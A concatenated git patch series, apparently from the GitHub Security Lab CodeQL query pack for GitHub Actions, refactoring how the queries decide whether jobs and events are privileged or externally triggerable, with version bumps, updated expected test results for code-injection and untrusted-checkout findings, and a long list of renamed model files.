// the Job is triggered by an event other than `pull_request`, `push`, or `workflow_call` count(this.getATriggerEvent()) = 1 and + not this.getATriggerEvent().getName() = "push" and not this.getATriggerEvent().getName() = "pull_request" and not this.getATriggerEvent().getName() = "workflow_call" or @@ -832,8 +833,11 @@ class JobImpl extends AstNodeImpl, TJobNode { not exists(this.getEnclosingWorkflow().(ReusableWorkflowImpl).getACaller()) ) or - // the Workflow has multiple triggers so at least one is not "pull_request" - count(this.getATriggerEvent()) > 1 + // the Job is triggered by an event other than `push`, `pull_request`, or `workflow_call` + exists(string event | + this.getATriggerEvent().getName() = event and + not event = ["push", "pull_request", "workflow_call"] + ) } /** Gets the trigger event that starts this workflow. */ diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 84f18e2b521..9acfb3035a4 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: githubsecuritylab/actions-all -version: 0.0.31 +version: 0.0.32 dependencies: codeql/util: ^0.2.0 codeql/yaml: ^0.1.2 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index 4a196108be6..5637bef68a0 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: githubsecuritylab/actions-queries -version: 0.0.31 +version: 0.0.32 groups: - actions - queries diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected index 2660a726ab6..1f90c56607d 100644 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected @@ -1,7 +1,5 @@ | .github/workflows/auto_ci.yml:20:9:27:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/auto_ci.yml:67:9:74:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | -| .github/workflows/dependabot1.yml:15:9:19:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | -| .github/workflows/dependabot1.yml:39:9:43:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/gitcheckout.yml:10:11:18:8 | Run Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/level0.yml:99:9:103:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/level0.yml:125:9:129:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutMedium.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutMedium.expected index e69de29bb2d..9adfa3cee7c 100644 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutMedium.expected +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutMedium.expected @@ -0,0 +1,2 @@ +| .github/workflows/dependabot1.yml:15:9:19:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | +| .github/workflows/dependabot1.yml:39:9:43:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | From 88465bd0e350b1da1ff468a96af6d04f85a86dab Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 3 Jun 2024 11:26:51 +0200 Subject: [PATCH 0313/1267] Improve privleged detection --- ql/lib/codeql/actions/Ast.qll | 12 +- ql/lib/codeql/actions/Helper.qll | 46 +--- ql/lib/codeql/actions/ast/internal/Ast.qll | 215 ++++++++++-------- ql/src/Security/CWE-349/CachePoisoning.ql | 2 +- .../CWE-349/CachePoisoningByCodeInjection.ql | 2 +- .../CWE-094/CodeInjectionCritical.expected | 1 - .../CWE-094/CodeInjectionMedium.expected | 1 + 7 files changed, 141 insertions(+), 138 deletions(-) diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index 9be2580f36e..e837c6fcb30 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll @@ -77,6 +77,8 @@ class CompositeAction extends AstNode instanceof CompositeActionImpl { LocalJob getACaller() { result = super.getACaller() } predicate isPrivileged() { super.isPrivileged() } + + predicate isPrivilegedExternallyTriggerable() { super.isPrivilegedExternallyTriggerable() } } /** @@ -169,6 +171,10 @@ class Event extends AstNode instanceof EventImpl { string getAPropertyValue(string prop) { result = super.getAPropertyValue(prop) } predicate hasProperty(string prop) { super.hasProperty(prop) } + + predicate isExternallyTriggerable() { super.isExternallyTriggerable() } + + predicate isPrivileged() { super.isPrivileged() } } /** @@ -198,11 +204,11 @@ abstract class Job extends AstNode instanceof JobImpl { Strategy getStrategy() { result = super.getStrategy() } + string getARunsOnLabel() { result = super.getARunsOnLabel() } + predicate isPrivileged() { super.isPrivileged() } - predicate isExternallyTriggerable() { super.isExternallyTriggerable() } - - string getARunsOnLabel() { result = super.getARunsOnLabel() } + predicate isPrivilegedExternallyTriggerable() { super.isPrivilegedExternallyTriggerable() } } class LocalJob extends Job instanceof LocalJobImpl { diff --git a/ql/lib/codeql/actions/Helper.qll b/ql/lib/codeql/actions/Helper.qll index 563a9800214..401ba89eca7 100644 --- a/ql/lib/codeql/actions/Helper.qll +++ b/ql/lib/codeql/actions/Helper.qll @@ -210,54 +210,28 @@ predicate writeToGitHubPath(Run run, string content) { predicate inPrivilegedCompositeAction(AstNode node) { exists(CompositeAction a | - // node is in a privileged composite action a = node.getEnclosingCompositeAction() and - ( - a.isPrivileged() - or - exists(Job caller | - caller = a.getACaller() and - caller.isPrivileged() and - caller.isExternallyTriggerable() - ) - ) - ) -} - -predicate inPrivilegedExternallyTriggerableJob(AstNode node) { - exists(Job j | - // node is in a privileged and externally triggereable job - j = node.getEnclosingJob() and - // job is privileged (write access or access to secrets) - j.isPrivileged() and - // job is triggereable by an external user - j.isExternallyTriggerable() + a.isPrivilegedExternallyTriggerable() ) } predicate inNonPrivilegedCompositeAction(AstNode node) { exists(CompositeAction a | - // node is in a non-privileged composite action a = node.getEnclosingCompositeAction() and - not a.isPrivileged() and - not exists(LocalJob caller | - caller = a.getACaller() and - caller.isPrivileged() and - caller.isExternallyTriggerable() - ) + not a.isPrivilegedExternallyTriggerable() + ) +} + +predicate inPrivilegedExternallyTriggerableJob(AstNode node) { + exists(Job j | + j = node.getEnclosingJob() and + j.isPrivilegedExternallyTriggerable() ) } predicate inNonPrivilegedJob(AstNode node) { exists(Job j | - // node is in a non-privileged or not externally triggereable job j = node.getEnclosingJob() and - ( - // job is non-privileged (no write access and no access to secrets) - not j.isPrivileged() - or - // job is triggereable by an external user - not j.isExternallyTriggerable() - ) + not j.isPrivilegedExternallyTriggerable() ) } diff --git a/ql/lib/codeql/actions/ast/internal/Ast.qll b/ql/lib/codeql/actions/ast/internal/Ast.qll index 2b15061be3d..e31edf7900a 100644 --- a/ql/lib/codeql/actions/ast/internal/Ast.qll +++ b/ql/lib/codeql/actions/ast/internal/Ast.qll @@ -317,18 +317,6 @@ class CompositeActionImpl extends AstNodeImpl, TCompositeAction { ) } - /** Holds if the action is privileged. */ - predicate isPrivileged() { - // there is a calling job that defines explicit write permissions - this.hasExplicitWritePermission() - or - // the actions has an explicit secret accesses - this.hasExplicitSecretAccess() - or - // there is a privileged caller job - this.getACaller().isPrivileged() - } - private predicate hasExplicitSecretAccess() { // the job accesses a secret other than GITHUB_TOKEN exists(SecretsExpressionImpl expr | @@ -340,6 +328,35 @@ class CompositeActionImpl extends AstNodeImpl, TCompositeAction { // a calling job has an explicit write permission this.getACaller().getPermissions().getAPermission().matches("%write") } + + /** Holds if the action is privileged. */ + predicate isPrivileged() { + // there is a calling job that defines explicit write permissions + this.hasExplicitWritePermission() + or + // the actions has an explicit secret accesses + this.hasExplicitSecretAccess() + or + // there is a privileged caller job + ( + this.getACaller().isPrivileged() + or + not this.getACaller().isPrivileged() and + this.getACaller().getATriggerEvent().isPrivileged() + ) + } + + /** Holds if the action is privileged and externally triggerable. */ + predicate isPrivilegedExternallyTriggerable() { + // the action is externally triggerable + exists(JobImpl caller, EventImpl event | + caller = this.getACaller() and + event = caller.getATriggerEvent() and + event.isExternallyTriggerable() and + // the action is privileged + (this.isPrivileged() or caller.isPrivileged()) + ) + } } class WorkflowImpl extends AstNodeImpl, TWorkflowNode { @@ -688,6 +705,42 @@ class EventImpl extends AstNodeImpl, TEventNode { /** Holds if the event has a property with the given name */ predicate hasProperty(string prop) { exists(this.getAPropertyValue(prop)) } + + /** Holds if the event can be triggered by an external actor. */ + predicate isExternallyTriggerable() { + // the job is triggered by an event that can be triggered externally + externallyTriggerableEventsDataModel(this.getName()) + or + // the event is `workflow_call` and there is a caller workflow that can be triggered externally + this.getName() = "workflow_call" and + ( + // there are hints that this workflow is meant to be called by external triggers + exists(ExpressionImpl expr, string external_trigger | + expr.getEnclosingWorkflow() = this.getEnclosingWorkflow() and + expr.getExpression().matches("%github.event" + external_trigger + "%") and + externallyTriggerableEventsDataModel(external_trigger) + ) + or + this.getEnclosingWorkflow() + .(ReusableWorkflowImpl) + .getACaller() + .getATriggerEvent() + .isExternallyTriggerable() + ) + } + + predicate isPrivileged() { + // the Job is triggered by an event other than `pull_request`, or `workflow_call` + not this.getName() = "pull_request" and + not this.getName() = "workflow_call" + or + // Reusable Workflow with a privileged caller or we cant find a caller + this.getName() = "workflow_call" and + ( + this.getEnclosingWorkflow().(ReusableWorkflowImpl).getACaller().isPrivileged() or + not exists(this.getEnclosingWorkflow().(ReusableWorkflowImpl).getACaller()) + ) + } } class JobImpl extends AstNodeImpl, TJobNode { @@ -746,43 +799,39 @@ class JobImpl extends AstNodeImpl, TJobNode { /** Gets the strategy for this job. */ StrategyImpl getStrategy() { result.getNode() = n.lookup("strategy") } - /** Holds if the job can be triggered by an external actor. */ - predicate isExternallyTriggerable() { - // the job is triggered by an event that can be triggered externally - externallyTriggerableEventsDataModel(this.getATriggerEvent().getName()) - or - // the job is triggered by a workflow_call event that can be triggered externally - this.getATriggerEvent().getName() = "workflow_call" and - ( - exists(ExpressionImpl e, string external_trigger | - e.getEnclosingJob() = this and - e.getExpression().matches("%github.event" + external_trigger + "%") and - externallyTriggerableEventsDataModel(external_trigger) - ) - or - this.getEnclosingWorkflow().(ReusableWorkflowImpl).getACaller().isExternallyTriggerable() - ) - } + /** Gets the trigger event that starts this workflow. */ + EventImpl getATriggerEvent() { result = this.getEnclosingWorkflow().getATriggerEvent() } - /** Holds if the job is privileged. */ - predicate isPrivileged() { - // the job has privileged runtime permissions - this.hasRuntimeWritePermissions() - or - // the job has an explicit secret accesses - this.hasExplicitSecretAccess() - or - // the job has an explicit write permission - this.hasExplicitWritePermission() - or - // the job has no explicit permissions but the workflow has write permissions - not exists(this.getPermissions()) and - this.hasImplicitWritePermission() - or - // neither the job nor the workflow have permissions but the job has a privileged trigger - not exists(this.getPermissions()) and - not exists(this.getEnclosingWorkflow().getPermissions()) and - this.hasPrivilegedTrigger() + // private predicate hasSingleTrigger(string trigger) { + // this.getATriggerEvent().getName() = trigger and + // count(this.getATriggerEvent()) = 1 + // } + /** Gets the runs-on field of the job. */ + string getARunsOnLabel() { + exists(ScalarValueImpl lbl, YamlMappingLikeNode runson | + runson = n.lookup("runs-on").(YamlMappingLikeNode) + | + ( + lbl.getNode() = runson.getNode(_) and + not lbl.getNode() = runson.getNode("group") + or + lbl.getNode() = runson.getNode("labels").(YamlMappingLikeNode).getNode(_) + ) and + ( + not exists(MatrixExpressionImpl e | e.getParentNode() = lbl) and + result = + lbl.getValue() + .trim() + .regexpReplaceAll("^('|\")", "") + .regexpReplaceAll("('|\")$", "") + .trim() + or + exists(MatrixExpressionImpl e | + e.getParentNode() = lbl and + result = e.getLiteralValues() + ) + ) + ) } private predicate hasExplicitSecretAccess() { @@ -817,60 +866,34 @@ class JobImpl extends AstNodeImpl, TJobNode { ) } - private predicate hasPrivilegedTrigger() { - // the Job is triggered by an event other than `pull_request`, `push`, or `workflow_call` - count(this.getATriggerEvent()) = 1 and - not this.getATriggerEvent().getName() = "push" and - not this.getATriggerEvent().getName() = "pull_request" and - not this.getATriggerEvent().getName() = "workflow_call" + /** Holds if the job is privileged. */ + predicate isPrivileged() { + // the job has privileged runtime permissions + this.hasRuntimeWritePermissions() or - // the Workflow is a Reusable Workflow only and there is - // a privileged caller workflow or we cant find a caller - count(this.getATriggerEvent()) = 1 and - this.getATriggerEvent().getName() = "workflow_call" and - ( - this.getEnclosingWorkflow().(ReusableWorkflowImpl).getACaller().isPrivileged() or - not exists(this.getEnclosingWorkflow().(ReusableWorkflowImpl).getACaller()) - ) + // the job has an explicit secret accesses + this.hasExplicitSecretAccess() or - // the Job is triggered by an event other than `push`, `pull_request`, or `workflow_call` - exists(string event | - this.getATriggerEvent().getName() = event and - not event = ["push", "pull_request", "workflow_call"] - ) + // the job has an explicit write permission + this.hasExplicitWritePermission() + or + // the job has no explicit permissions but the workflow has write permissions + not exists(this.getPermissions()) and + this.hasImplicitWritePermission() } - /** Gets the trigger event that starts this workflow. */ - EventImpl getATriggerEvent() { result = this.getEnclosingWorkflow().getATriggerEvent() } - - // private predicate hasSingleTrigger(string trigger) { - // this.getATriggerEvent().getName() = trigger and - // count(this.getATriggerEvent()) = 1 - // } - /** Gets the runs-on field of the job. */ - string getARunsOnLabel() { - exists(ScalarValueImpl lbl, YamlMappingLikeNode runson | - runson = n.lookup("runs-on").(YamlMappingLikeNode) - | + /** Holds if the action is privileged and externally triggerable. */ + predicate isPrivilegedExternallyTriggerable() { + exists(EventImpl e | + // job is triggereable by an external user + this.getATriggerEvent() = e and + e.isExternallyTriggerable() and + // job is privileged (write access or access to secrets) ( - lbl.getNode() = runson.getNode(_) and - not lbl.getNode() = runson.getNode("group") + this.isPrivileged() or - lbl.getNode() = runson.getNode("labels").(YamlMappingLikeNode).getNode(_) - ) and - ( - not exists(MatrixExpressionImpl e | e.getParentNode() = lbl) and - result = - lbl.getValue() - .trim() - .regexpReplaceAll("^('|\")", "") - .regexpReplaceAll("('|\")$", "") - .trim() - or - exists(MatrixExpressionImpl e | - e.getParentNode() = lbl and - result = e.getLiteralValues() - ) + not this.isPrivileged() and + e.isPrivileged() ) ) } diff --git a/ql/src/Security/CWE-349/CachePoisoning.ql b/ql/src/Security/CWE-349/CachePoisoning.ql index 80ebd92c5d3..d81c13021c1 100644 --- a/ql/src/Security/CWE-349/CachePoisoning.ql +++ b/ql/src/Security/CWE-349/CachePoisoning.ql @@ -24,7 +24,7 @@ where // TODO: Consider adding artifact downloads as a potential source of cache poisoning j.getAStep() = checkout and // job can be triggered by an external user - j.isExternallyTriggerable() and + j.getATriggerEvent().isExternallyTriggerable() and ( // the job writes to the cache // (No need to follow the checkout step as the cache writing is normally done after the job completes) diff --git a/ql/src/Security/CWE-349/CachePoisoningByCodeInjection.ql b/ql/src/Security/CWE-349/CachePoisoningByCodeInjection.ql index 1c13497ddaf..5ed3c966ad3 100644 --- a/ql/src/Security/CWE-349/CachePoisoningByCodeInjection.ql +++ b/ql/src/Security/CWE-349/CachePoisoningByCodeInjection.ql @@ -22,7 +22,7 @@ where CodeInjectionFlow::flowPath(source, sink) and j = sink.getNode().asExpr().getEnclosingJob() and // job can be triggered by an external user - j.isExternallyTriggerable() and + j.getATriggerEvent().isExternallyTriggerable() and // excluding privileged workflows since they can be easily exploited in similar circumstances not j.isPrivileged() and // The workflow runs in the context of the default branch diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected index 48412116363..a65f85d0486 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected @@ -261,7 +261,6 @@ nodes subpaths #select | .github/actions/action1/action.yml:7:19:7:55 | github.event.pull_request.body | .github/actions/action1/action.yml:7:19:7:55 | github.event.pull_request.body | .github/actions/action1/action.yml:7:19:7:55 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user. | .github/actions/action1/action.yml:7:19:7:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | -| .github/actions/action3/action.yml:9:19:9:55 | github.event.pull_request.body | .github/actions/action3/action.yml:9:19:9:55 | github.event.pull_request.body | .github/actions/action3/action.yml:9:19:9:55 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user. | .github/actions/action3/action.yml:9:19:9:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | | .github/actions/action5/action.yml:16:19:16:55 | github.event.pull_request.body | .github/actions/action5/action.yml:16:19:16:55 | github.event.pull_request.body | .github/actions/action5/action.yml:16:19:16:55 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user. | .github/actions/action5/action.yml:16:19:16:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | .github/workflows/argus_case_study.yml:17:25:17:53 | github.event.issue.title | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | ${{steps.remove_quotations.outputs.replaced}} | | .github/workflows/artifactpoisoning1.yml:34:67:34:92 | steps.pr.outputs.id | .github/workflows/artifactpoisoning1.yml:14:9:20:6 | Uses Step | .github/workflows/artifactpoisoning1.yml:34:67:34:92 | steps.pr.outputs.id | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning1.yml:34:67:34:92 | steps.pr.outputs.id | ${{ steps.pr.outputs.id }} | diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected index d577e2fd732..804c4f1df6c 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected @@ -260,6 +260,7 @@ nodes | .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | semmle.label | github.event.workflow_run.head_repository.description | subpaths #select +| .github/actions/action3/action.yml:9:19:9:55 | github.event.pull_request.body | .github/actions/action3/action.yml:9:19:9:55 | github.event.pull_request.body | .github/actions/action3/action.yml:9:19:9:55 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user. | .github/actions/action3/action.yml:9:19:9:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | | .github/actions/action4/action.yml:7:19:7:55 | github.event.pull_request.body | .github/actions/action4/action.yml:7:19:7:55 | github.event.pull_request.body | .github/actions/action4/action.yml:7:19:7:55 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user. | .github/actions/action4/action.yml:7:19:7:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | | .github/workflows/changed-files.yml:20:24:20:76 | steps.changed-files1.outputs.all_changed_files | .github/workflows/changed-files.yml:15:9:18:6 | Uses Step: changed-files1 | .github/workflows/changed-files.yml:20:24:20:76 | steps.changed-files1.outputs.all_changed_files | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/changed-files.yml:20:24:20:76 | steps.changed-files1.outputs.all_changed_files | ${{ steps.changed-files1.outputs.all_changed_files }} | | .github/workflows/changed-files.yml:40:24:40:76 | steps.changed-files3.outputs.all_changed_files | .github/workflows/changed-files.yml:33:9:38:6 | Uses Step: changed-files3 | .github/workflows/changed-files.yml:40:24:40:76 | steps.changed-files3.outputs.all_changed_files | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/changed-files.yml:40:24:40:76 | steps.changed-files3.outputs.all_changed_files | ${{ steps.changed-files3.outputs.all_changed_files }} | From a5c6df3070810e34500a5986b275ee1559cca432 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 3 Jun 2024 18:13:01 +0200 Subject: [PATCH 0314/1267] Move from yaml to js extractor --- .!79690!.DS_Store | 0 ql/lib/codeql-pack.lock.yml | 22 +++-- .../codeql/actions/dataflow/ExternalFlow.qll | 18 ++--- .../internal/ExternalFlowExtensions.qll | 6 +- ql/lib/ext/8398a7_action-slack.model.yml | 2 +- ...rSource_sonarcloud-github-action.model.yml | 2 +- ql/lib/ext/actions_github-script.model.yml | 2 +- ...ahmadnassri_action-changed-files.model.yml | 2 +- ql/lib/ext/akhileshns_heroku-deploy.model.yml | 4 +- ...nnn_action-semantic-pull-request.model.yml | 2 +- ql/lib/ext/anchore_sbom-action.model.yml | 2 +- ql/lib/ext/anchore_scan-action.model.yml | 2 +- .../ext/andresz1_size-limit-action.model.yml | 2 +- .../android-actions_setup-android.model.yml | 2 +- ...le-actions_import-codesign-certs.model.yml | 2 +- ql/lib/ext/asdf-vm_actions.model.yml | 2 +- ...taylor_read-json-property-action.model.yml | 2 +- ...ley-taylor_regex-property-action.model.yml | 2 +- .../aszc_change-string-case-action.model.yml | 2 +- ...ctions_configure-aws-credentials.model.yml | 2 +- .../axel-op_googlejavaformat-action.model.yml | 2 +- ql/lib/ext/azure_powershell.model.yml | 2 +- ql/lib/ext/bahmutov_npm-install.model.yml | 2 +- .../blackducksoftware_github-action.model.yml | 2 +- ql/lib/ext/bobheadxi_deployments.model.yml | 2 +- .../bufbuild_buf-breaking-action.model.yml | 4 +- ql/lib/ext/bufbuild_buf-lint-action.model.yml | 4 +- .../ext/bufbuild_buf-setup-action.model.yml | 2 +- ql/lib/ext/cachix_cachix-action.model.yml | 4 +- ql/lib/ext/changesets_action.model.yml | 2 +- .../ext/cloudflare_wrangler-action.model.yml | 2 +- ql/lib/ext/coursier_cache-action.model.yml | 2 +- .../crazy-max_ghaction-chocolatey.model.yml | 2 +- .../crazy-max_ghaction-import-gpg.model.yml | 2 +- .../csexton_release-asset-action.model.yml | 2 +- ...cycjimmy_semantic-release-action.model.yml | 2 +- ql/lib/ext/cypress-io_github-action.model.yml | 2 +- .../ext/dailydotdev_action-devcard.model.yml | 2 +- ...me_reportgenerator-github-action.model.yml | 2 +- .../daspn_private-actions-checkout.model.yml | 2 +- .../dawidd6_action-ansible-playbook.model.yml | 2 +- ...dawidd6_action-download-artifact.model.yml | 2 +- ql/lib/ext/delaguardo_setup-clojure.model.yml | 2 +- ...tesystems_magic-nix-cache-action.model.yml | 2 +- ...er-practice_actions-setup-docker.model.yml | 2 +- ql/lib/ext/docker_build-push-action.model.yml | 2 +- ql/lib/ext/endbug_latest-tag.model.yml | 2 +- ql/lib/ext/expo_expo-github-action.model.yml | 2 +- ...seextended_action-hosting-deploy.model.yml | 2 +- .../frabert_replace-string-action.model.yml | 2 +- ...nzdiebold_github-env-vars-action.model.yml | 2 +- ql/lib/ext/gabrielbb_xvfb-action.model.yml | 2 +- ql/lib/ext/game-ci_unity-builder.model.yml | 2 +- .../ext/game-ci_unity-test-runner.model.yml | 2 +- ...autamkrishnar_blog-post-workflow.model.yml | 2 +- ...ctions_actions-runner-controller.model.yml | 2 +- .../composite-actions/adap_flower.model.yml | 2 +- .../agoric_agoric-sdk.model.yml | 2 +- .../airbnb_lottie-ios.model.yml | 2 +- .../airbytehq_airbyte.model.yml | 2 +- .../amazon-ion_ion-java.model.yml | 2 +- .../composite-actions/anchore_grype.model.yml | 2 +- .../composite-actions/anchore_syft.model.yml | 2 +- .../angular_dev-infra.model.yml | 2 +- .../ansible_ansible-lint.model.yml | 2 +- .../composite-actions/ansible_awx.model.yml | 2 +- .../apache_arrow-datafusion.model.yml | 2 +- .../apache_arrow-rs.model.yml | 2 +- .../composite-actions/apache_arrow.model.yml | 2 +- .../apache_bookkeeper.model.yml | 2 +- .../composite-actions/apache_brpc.model.yml | 2 +- .../apache_camel-k.model.yml | 2 +- .../composite-actions/apache_camel.model.yml | 2 +- .../composite-actions/apache_flink.model.yml | 2 +- .../apache_incubator-kie-tools.model.yml | 2 +- .../composite-actions/apache_nuttx.model.yml | 2 +- .../apache_opendal.model.yml | 2 +- .../composite-actions/apache_pekko.model.yml | 2 +- .../apache_pulsar-helm-chart.model.yml | 2 +- .../apache_superset.model.yml | 2 +- .../appflowy-io_appflowy.model.yml | 2 +- .../aptos-labs_aptos-core.model.yml | 2 +- .../archivesspace_archivesspace.model.yml | 2 +- .../armadaproject_armada.model.yml | 2 +- .../composite-actions/armbian_build.model.yml | 2 +- .../auth0_auth0-java.model.yml | 2 +- .../auth0_auth0.net.model.yml | 2 +- .../auth0_auth0.swift.model.yml | 2 +- .../autogluon_autogluon.model.yml | 2 +- .../composite-actions/avaiga_taipy.model.yml | 2 +- .../aws-amplify_amplify-cli.model.yml | 2 +- ...ertools_powertools-lambda-python.model.yml | 2 +- .../aws_amazon-vpc-cni-k8s.model.yml | 2 +- .../aws_karpenter-provider-aws.model.yml | 2 +- .../awslabs_amazon-eks-ami.model.yml | 2 +- .../awslabs_aws-lambda-rust-runtime.model.yml | 2 +- .../azerothcore_azerothcore-wotlk.model.yml | 2 +- .../azure_azure-datafactory.model.yml | 2 +- .../badges_shields.model.yml | 2 +- .../balena-io_etcher.model.yml | 2 +- .../balena-os_balena-engine.model.yml | 2 +- .../ben-manes_caffeine.model.yml | 2 +- .../composite-actions/bokeh_bokeh.model.yml | 2 +- .../botpress_botpress.model.yml | 2 +- ...intree_braintree-android-drop-in.model.yml | 2 +- .../braintree_braintree_android.model.yml | 2 +- .../broadinstitute_gatk.model.yml | 2 +- .../canonical_multipass.model.yml | 2 +- .../chia-network_actions.model.yml | 2 +- .../chia-network_chia-blockchain.model.yml | 2 +- .../chipsalliance_chisel.model.yml | 2 +- .../chocobozzz_peertube.model.yml | 2 +- .../cilium_cilium-cli.model.yml | 2 +- .../composite-actions/cilium_cilium.model.yml | 2 +- .../citusdata_citus.model.yml | 2 +- .../clerk_javascript.model.yml | 2 +- .../cloud-custodian_cloud-custodian.model.yml | 2 +- .../cloudflare_workers-sdk.model.yml | 2 +- ...cloudfoundry_cloud_controller_ng.model.yml | 2 +- .../composite-actions/coder_coder.model.yml | 2 +- .../composite-actions/coil-kt_coil.model.yml | 2 +- .../commaai_openpilot.model.yml | 2 +- .../conan-io_conan-center-index.model.yml | 2 +- .../corretto_corretto-8.model.yml | 2 +- .../cosmos_cosmos-sdk.model.yml | 2 +- .../composite-actions/coturn_coturn.model.yml | 2 +- .../crunchydata_postgres-operator.model.yml | 2 +- .../composite-actions/cvc5_cvc5.model.yml | 2 +- .../composite-actions/d2l-ai_d2l-en.model.yml | 2 +- ...build-check-deploy-gradle-action.model.yml | 2 +- .../datadog_dd-trace-dotnet.model.yml | 2 +- .../datadog_dd-trace-go.model.yml | 2 +- .../datadog_dd-trace-js.model.yml | 2 +- .../datafuselabs_databend.model.yml | 2 +- .../davatorium_rofi.model.yml | 2 +- .../debezium_debezium.model.yml | 2 +- .../defenseunicorns_zarf.model.yml | 2 +- ...lifiees_demarches-simplifiees.fr.model.yml | 2 +- ...of-veterans-affairs_vets-website.model.yml | 2 +- .../devexpress_devextreme.model.yml | 2 +- .../diggerhq_digger.model.yml | 2 +- .../diku-dk_futhark.model.yml | 2 +- .../discourse_.github.model.yml | 2 +- .../dnsjava_dnsjava.model.yml | 2 +- .../dotintent_react-native-ble-plx.model.yml | 2 +- .../dotnet_docs-tools.model.yml | 2 +- .../dotnet_dotnet-monitor.model.yml | 2 +- .../dragonflydb_dragonfly.model.yml | 2 +- .../drawpile_drawpile.model.yml | 2 +- .../eksctl-io_eksctl.model.yml | 2 +- .../elastic_apm-agent-dotnet.model.yml | 2 +- .../elastic_apm-agent-java.model.yml | 2 +- .../elastic_apm-server.model copy.yml | 2 +- .../elementor_elementor.model.yml | 2 +- .../composite-actions/emberjs_data.model.yml | 2 +- .../composite-actions/emqx_emqx.model.yml | 2 +- .../eonasdan_tempus-dominus.model.yml | 2 +- .../composite-actions/erlang_otp.model.yml | 2 +- .../esphome_esphome.model.yml | 2 +- .../composite-actions/expensify_app.model.yml | 2 +- .../composite-actions/expo_expo.model.yml | 2 +- .../expo_vscode-expo.model.yml | 2 +- ...xternal-secrets_external-secrets.model.yml | 2 +- .../facebook_buck2.model.yml | 2 +- .../composite-actions/facebook_flow.model.yml | 2 +- .../composite-actions/facebook_yoga.model.yml | 2 +- .../facebookresearch_xformers.model.yml | 2 +- .../fastly_compute-actions.model.yml | 2 +- .../composite-actions/felangel_bloc.model.yml | 2 +- .../firebase_firebase-ios-sdk.model.yml | 2 +- .../flagsmith_flagsmith.model.yml | 2 +- .../flaxengine_flaxengine.model.yml | 2 +- ...pperdevices_flipperzero-firmware.model.yml | 2 +- .../composite-actions/fluxcd_flux2.model.yml | 2 +- .../forcedotcom_salesforcedx-vscode.model.yml | 2 +- .../fossasia_visdom.model.yml | 2 +- .../freckle_stack-action.model.yml | 2 +- .../freeradius_freeradius-server.model.yml | 2 +- .../composite-actions/gaphor_gaphor.model.yml | 2 +- .../getsentry_action-release.model.yml | 2 +- .../github_codeql-action.model.yml | 2 +- .../composite-actions/github_ruby.model.yml | 2 +- .../gittools_gitversion.model.yml | 2 +- .../go-spatial_tegola.model.yml | 2 +- .../goauthentik_authentik.model.yml | 2 +- .../godotengine_godot.model.yml | 2 +- .../composite-actions/google_dagger.model.yml | 2 +- .../googleapis_java-cloud-bom.model.yml | 2 +- .../googleapis_sdk-platform-java.model.yml | 2 +- ...ecloudplatform_dataflowtemplates.model.yml | 4 +- ...ooglecloudplatform_magic-modules.model.yml | 2 +- .../gravitational_teleport.model.yml | 2 +- .../grote_transportr.model.yml | 2 +- .../hashicorp_nomad.model.yml | 2 +- .../hashicorp_terraform.model.yml | 2 +- 